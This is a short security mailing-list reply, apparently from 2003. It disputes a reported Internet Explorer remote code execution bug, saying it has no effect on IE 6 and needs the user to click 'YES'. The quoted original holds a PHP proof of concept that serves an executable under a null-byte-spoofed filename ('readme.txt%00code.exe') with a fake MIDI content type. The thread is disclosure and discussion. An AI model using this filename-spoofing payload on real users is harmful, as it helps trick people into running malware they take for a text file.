In-Reply-To: <Pine.LNX.4.44.0310190012380.170-100000@osiris> Hi, NO effect on : Internet Explorer 6 SP1 (Windows XP) Internet Explorer 6 For Windows 2003 Server The user MUST accept to execute the file by clicking "YES", so it's not more dangerous than a direct link to an .exe file ... Regards. K-OTik Staff /// http://www.k-otik.com >From: Marcin Ulikowski <r3b00t@tx.pl> >Subject: IE remote code execution > >This code can execute any code remotely using IE - as you can see very simple. > >// for IE 5, tested on default Windows 98SE installation ><?php >Header("Content-type: audio/midi"); >Header("Content-Disposition: inline; filename=readme.txt%00code.exe"); >readfile("code.exe"); >?> ><noscript> >
